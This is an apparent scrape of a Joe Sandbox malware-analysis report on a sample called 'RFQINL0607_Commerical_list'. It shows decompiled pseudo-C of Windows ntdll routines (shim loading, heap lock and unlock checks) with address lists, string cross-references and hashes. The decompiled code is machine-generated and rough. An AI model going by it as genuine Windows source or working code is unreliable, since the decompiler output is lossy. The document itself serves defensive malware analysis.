						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E333CE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x334437c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E333D1D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						L33392C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                                                                                                                                                                                  0x33346574
                                                                                                                                                                                  0x3334657d
                                                                                                                                                                                  0x33346581
                                                                                                                                                                                  0x3334658b
                                                                                                                                                                                  0x33346590
                                                                                                                                                                                  0x33346598
                                                                                                                                                                                  0x333465a3
                                                                                                                                                                                  0x333465a6
                                                                                                                                                                                  0x333465ad
                                                                                                                                                                                  0x333465b1
                                                                                                                                                                                  0x333465b3
                                                                                                                                                                                  0x333465b8
                                                                                                                                                                                  0x33346637
                                                                                                                                                                                  0x33346637
                                                                                                                                                                                  0x3334663a
                                                                                                                                                                                  0x3334663e
                                                                                                                                                                                  0x333466fa
                                                                                                                                                                                  0x333466fa
                                                                                                                                                                                  0x3334664c
                                                                                                                                                                                  0x33346659
                                                                                                                                                                                  0x3334665f
                                                                                                                                                                                  0x33346665
                                                                                                                                                                                  0x33346667
                                                                                                                                                                                  0x3334666f
                                                                                                                                                                                  0x33346678
                                                                                                                                                                                  0x3334667d
                                                                                                                                                                                  0x33346684
                                                                                                                                                                                  0x33346686
                                                                                                                                                                                  0x33346692
                                                                                                                                                                                  0x33346697
                                                                                                                                                                                  0x333a98c3
                                                                                                                                                                                  0x333a98d3
                                                                                                                                                                                  0x333a98d3
                                                                                                                                                                                  0x333a98d5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a98ca
                                                                                                                                                                                  0x333a98cd
                                                                                                                                                                                  0x333a98cd
                                                                                                                                                                                  0x333a98cd
                                                                                                                                                                                  0x333a98d1
                                                                                                                                                                                  0x333a98d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334669d
                                                                                                                                                                                  0x3334669d
                                                                                                                                                                                  0x333466a4
                                                                                                                                                                                  0x333466aa
                                                                                                                                                                                  0x333466ac
                                                                                                                                                                                  0x333466ac
                                                                                                                                                                                  0x333466b0
                                                                                                                                                                                  0x333466c9
                                                                                                                                                                                  0x333466cb
                                                                                                                                                                                  0x333466d7
                                                                                                                                                                                  0x333466dc
                                                                                                                                                                                  0x333466e1
                                                                                                                                                                                  0x333466f6
                                                                                                                                                                                  0x333466b2
                                                                                                                                                                                  0x333466b2
                                                                                                                                                                                  0x333466b2
                                                                                                                                                                                  0x333466b5
                                                                                                                                                                                  0x333466b7
                                                                                                                                                                                  0x333466b7
                                                                                                                                                                                  0x333466ba
                                                                                                                                                                                  0x333466bf
                                                                                                                                                                                  0x333466c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333466b2
                                                                                                                                                                                  0x333466b0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333465ba
                                                                                                                                                                                  0x333465ba
                                                                                                                                                                                  0x333465bf
                                                                                                                                                                                  0x333465d5
                                                                                                                                                                                  0x333465d9
                                                                                                                                                                                  0x333a9835
                                                                                                                                                                                  0x333a983a
                                                                                                                                                                                  0x333a983c
                                                                                                                                                                                  0x333a983e
                                                                                                                                                                                  0x333a9859
                                                                                                                                                                                  0x333a985e
                                                                                                                                                                                  0x333a9863
                                                                                                                                                                                  0x333a9863
                                                                                                                                                                                  0x333a9866
                                                                                                                                                                                  0x333a9868
                                                                                                                                                                                  0x333a986a
                                                                                                                                                                                  0x333a986a
                                                                                                                                                                                  0x333a986d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a986d
                                                                                                                                                                                  0x333465e2
                                                                                                                                                                                  0x333465ec
                                                                                                                                                                                  0x333465f1
                                                                                                                                                                                  0x333465f4
                                                                                                                                                                                  0x333465f7
                                                                                                                                                                                  0x333465fb
                                                                                                                                                                                  0x3334660f
                                                                                                                                                                                  0x33346614
                                                                                                                                                                                  0x3334661a
                                                                                                                                                                                  0x3334661c
                                                                                                                                                                                  0x3334661f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334661f
                                                                                                                                                                                  0x33346602
                                                                                                                                                                                  0x33346606
                                                                                                                                                                                  0x333a9875
                                                                                                                                                                                  0x333a987a
                                                                                                                                                                                  0x333a987c
                                                                                                                                                                                  0x333a987e
                                                                                                                                                                                  0x333a9880
                                                                                                                                                                                  0x333a989a
                                                                                                                                                                                  0x333a989f
                                                                                                                                                                                  0x333a98a4
                                                                                                                                                                                  0x333a98a7
                                                                                                                                                                                  0x333a98a9
                                                                                                                                                                                  0x333a98ab
                                                                                                                                                                                  0x333a98ab
                                                                                                                                                                                  0x333a98ac
                                                                                                                                                                                  0x333a98ae
                                                                                                                                                                                  0x333a98b3
                                                                                                                                                                                  0x333a98b4
                                                                                                                                                                                  0x333a98b6
                                                                                                                                                                                  0x333a98bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a98bd
                                                                                                                                                                                  0x3334660c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33346624
                                                                                                                                                                                  0x3334662a
                                                                                                                                                                                  0x3334662f
                                                                                                                                                                                  0x33346636
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 333A9854, 333A9895
                                                                                                                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 333A9843
                                                                                                                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 333A9885
                                                                                                                                                                                  • LdrpLoadShimEngine, xrefs: 333A984A, 333A988B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 3446177414-3589223738
                                                                                                                                                                                  • Opcode ID: b930bcf8a6979d1fc4ca07086f4c80aa961e56819a57d8710b25dd8f82959389
                                                                                                                                                                                  • Instruction ID: 392475fa0894930ce22e7c401c63a09dabda6de8969df2a6f24ac81d1774ccc7
                                                                                                                                                                                  • Opcode Fuzzy Hash: b930bcf8a6979d1fc4ca07086f4c80aa961e56819a57d8710b25dd8f82959389
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34513F76E413589FEB04EFA8CC94A9D77EAAB40314F08C169E450FB295DB789C45CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                                                  			E3337DA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E33419335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3340F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x3344376c; // 0x0
					 *0x334491e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3334B910();
					} else {
						E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3334B910("Invalid heap signature for heap at %p", _t93);
					E3334B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E3334B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x334447a1 = 1;
						asm("int3");
						 *0x334447a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E333EAA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E3337FEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E3337BAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E3337F300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                                                                                                                                                  0x3337da2a
                                                                                                                                                                                  0x3337da35
                                                                                                                                                                                  0x333bf408
                                                                                                                                                                                  0x3337da90
                                                                                                                                                                                  0x3337da96
                                                                                                                                                                                  0x3337da9b
                                                                                                                                                                                  0x333bf510
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf51f
                                                                                                                                                                                  0x3337daa6
                                                                                                                                                                                  0x3337daa9
                                                                                                                                                                                  0x333bf537
                                                                                                                                                                                  0x333bf53f
                                                                                                                                                                                  0x333bf53f
                                                                                                                                                                                  0x333bf537
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337daaf
                                                                                                                                                                                  0x3337daa1
                                                                                                                                                                                  0x3337daa1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337daa1
                                                                                                                                                                                  0x3337da42
                                                                                                                                                                                  0x333bf413
                                                                                                                                                                                  0x333bf41b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf421
                                                                                                                                                                                  0x3337da4f
                                                                                                                                                                                  0x333bf432
                                                                                                                                                                                  0x333bf451
                                                                                                                                                                                  0x333bf456
                                                                                                                                                                                  0x333bf434
                                                                                                                                                                                  0x333bf449
                                                                                                                                                                                  0x333bf44e
                                                                                                                                                                                  0x333bf462
                                                                                                                                                                                  0x333bf471
                                                                                                                                                                                  0x333bf476
                                                                                                                                                                                  0x333bf47b
                                                                                                                                                                                  0x333bf48d
                                                                                                                                                                                  0x333bf48f
                                                                                                                                                                                  0x333bf496
                                                                                                                                                                                  0x333bf497
                                                                                                                                                                                  0x333bf497
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf49e
                                                                                                                                                                                  0x3337da59
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337da5b
                                                                                                                                                                                  0x3337da66
                                                                                                                                                                                  0x3337da6d
                                                                                                                                                                                  0x3337da6d
                                                                                                                                                                                  0x3337da71
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337da73
                                                                                                                                                                                  0x3337da77
                                                                                                                                                                                  0x3337da7f
                                                                                                                                                                                  0x3337da80
                                                                                                                                                                                  0x3337da84
                                                                                                                                                                                  0x3337da8a
                                                                                                                                                                                  0x333bf4a8
                                                                                                                                                                                  0x333bf4ab
                                                                                                                                                                                  0x333bf4ab
                                                                                                                                                                                  0x333bf4b0
                                                                                                                                                                                  0x333bf4b3
                                                                                                                                                                                  0x333bf4b8
                                                                                                                                                                                  0x333bf4c1
                                                                                                                                                                                  0x333bf4c1
                                                                                                                                                                                  0x333bf4c4
                                                                                                                                                                                  0x333bf4c8
                                                                                                                                                                                  0x333bf4cb
                                                                                                                                                                                  0x333bf4ce
                                                                                                                                                                                  0x333bf4d5
                                                                                                                                                                                  0x333bf4d8
                                                                                                                                                                                  0x333bf4db
                                                                                                                                                                                  0x333bf4e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf4e7
                                                                                                                                                                                  0x333bf4ec
                                                                                                                                                                                  0x333bf4ec
                                                                                                                                                                                  0x333bf4f0
                                                                                                                                                                                  0x333bf4f3
                                                                                                                                                                                  0x333bf4f9
                                                                                                                                                                                  0x333bf503
                                                                                                                                                                                  0x333bf503
                                                                                                                                                                                  0x333bf4f9
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                  • API String ID: 3446177414-3224558752
                                                                                                                                                                                  • Opcode ID: e1df1730bc23d0e6e6b4f716b24bc6a30b56d0a27a54a4dc3633f71112f47570
                                                                                                                                                                                  • Instruction ID: aeb1e9d8903296d0217f09d56d231314b3ca345e0fd7cf606f0cfcdb1f8206b4
                                                                                                                                                                                  • Opcode Fuzzy Hash: e1df1730bc23d0e6e6b4f716b24bc6a30b56d0a27a54a4dc3633f71112f47570
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF415734A04740DFEB01DF68C880B69B7F8FF40360F04C669E45597A82CB78E980CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 30%
                                                                                                                                                                                  			E3337DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E33419109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3340F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x33443768; // 0x0
					 *0x334491e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3334B910();
					} else {
						E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3334B910("Invalid heap signature for heap at %p", _t53);
					E3334B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E3334B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x334447a1 = 1;
						asm("int3");
						 *0x334447a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E3335FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                                                                                                                                                  0x3337dac8
                                                                                                                                                                                  0x3337dacb
                                                                                                                                                                                  0x3337dad6
                                                                                                                                                                                  0x333bf54e
                                                                                                                                                                                  0x3337db0e
                                                                                                                                                                                  0x3337db14
                                                                                                                                                                                  0x3337db19
                                                                                                                                                                                  0x333bf5ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf5fd
                                                                                                                                                                                  0x3337db24
                                                                                                                                                                                  0x3337db27
                                                                                                                                                                                  0x333bf614
                                                                                                                                                                                  0x333bf61c
                                                                                                                                                                                  0x333bf61c
                                                                                                                                                                                  0x333bf614
                                                                                                                                                                                  0x3337db2d
                                                                                                                                                                                  0x3337db2f
                                                                                                                                                                                  0x3337db31
                                                                                                                                                                                  0x3337db31
                                                                                                                                                                                  0x3337db1f
                                                                                                                                                                                  0x3337db1f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337db1f
                                                                                                                                                                                  0x3337dae3
                                                                                                                                                                                  0x333bf559
                                                                                                                                                                                  0x333bf561
                                                                                                                                                                                  0x333bf567
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf567
                                                                                                                                                                                  0x3337daf0
                                                                                                                                                                                  0x333bf578
                                                                                                                                                                                  0x333bf597
                                                                                                                                                                                  0x333bf59c
                                                                                                                                                                                  0x333bf57a
                                                                                                                                                                                  0x333bf58f
                                                                                                                                                                                  0x333bf594
                                                                                                                                                                                  0x333bf5a8
                                                                                                                                                                                  0x333bf5b7
                                                                                                                                                                                  0x333bf5bc
                                                                                                                                                                                  0x333bf5c1
                                                                                                                                                                                  0x333bf5d3
                                                                                                                                                                                  0x333bf5d5
                                                                                                                                                                                  0x333bf5dc
                                                                                                                                                                                  0x333bf5dd
                                                                                                                                                                                  0x333bf5dd
                                                                                                                                                                                  0x333bf5e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337daf6
                                                                                                                                                                                  0x3337dafa
                                                                                                                                                                                  0x3337db02
                                                                                                                                                                                  0x3337db07
                                                                                                                                                                                  0x3337db07
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337dafa

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                  • API String ID: 3446177414-1222099010
                                                                                                                                                                                  • Opcode ID: 3041be710f9546881c2eeecee229524c4d509e50b4cde32a605efba529a477e2
                                                                                                                                                                                  • Instruction ID: 9f2bc147210722a6a48f876e406970f40b238e32cf0fa7263e1319023270d4e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3041be710f9546881c2eeecee229524c4d509e50b4cde32a605efba529a477e2
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4315335901788EFFB12CF64C848B597BF8EF00650F08C595E48197E92CBB9E980CB51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33359046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E33359046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x3342be98);
				L333A7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E33398F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E33369870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x334465e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E3336A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E33375A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E333704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x334465e0; // 0x762da680
							 *0x334491e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x334465e8;
									if(_t148 != 0) {
										 *0x334491e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								L3336DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E33363B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E33369870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E333B247B();
									goto L26;
								} else {
									_t152 = E3336A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E333704C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                                                                                  0x33359046
                                                                                                                                                                                  0x33359046
                                                                                                                                                                                  0x3335904b
                                                                                                                                                                                  0x33359050
                                                                                                                                                                                  0x33359055
                                                                                                                                                                                  0x3335905b
                                                                                                                                                                                  0x3335905d
                                                                                                                                                                                  0x33359066
                                                                                                                                                                                  0x3335906f
                                                                                                                                                                                  0x33359078
                                                                                                                                                                                  0x33359080
                                                                                                                                                                                  0x33359088
                                                                                                                                                                                  0x3335908f
                                                                                                                                                                                  0x33359095
                                                                                                                                                                                  0x333590a9
                                                                                                                                                                                  0x333590b1
                                                                                                                                                                                  0x333590be
                                                                                                                                                                                  0x333590c6
                                                                                                                                                                                  0x333590cf
                                                                                                                                                                                  0x333590e2
                                                                                                                                                                                  0x333590f7
                                                                                                                                                                                  0x333590fb
                                                                                                                                                                                  0x33359118
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359123
                                                                                                                                                                                  0x3335913b
                                                                                                                                                                                  0x3335913f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359147
                                                                                                                                                                                  0x333b231f
                                                                                                                                                                                  0x333b231f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b231f
                                                                                                                                                                                  0x33359154
                                                                                                                                                                                  0x333b2330
                                                                                                                                                                                  0x333b2336
                                                                                                                                                                                  0x333b2336
                                                                                                                                                                                  0x3335915a
                                                                                                                                                                                  0x3335915a
                                                                                                                                                                                  0x3335915a
                                                                                                                                                                                  0x33359161
                                                                                                                                                                                  0x33359167
                                                                                                                                                                                  0x3335916b
                                                                                                                                                                                  0x33359172
                                                                                                                                                                                  0x33359182
                                                                                                                                                                                  0x3335918e
                                                                                                                                                                                  0x33359199
                                                                                                                                                                                  0x333591ba
                                                                                                                                                                                  0x333591be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333591e0
                                                                                                                                                                                  0x333b2358
                                                                                                                                                                                  0x333b2360
                                                                                                                                                                                  0x333b2368
                                                                                                                                                                                  0x333b236a
                                                                                                                                                                                  0x333b2372
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b2378
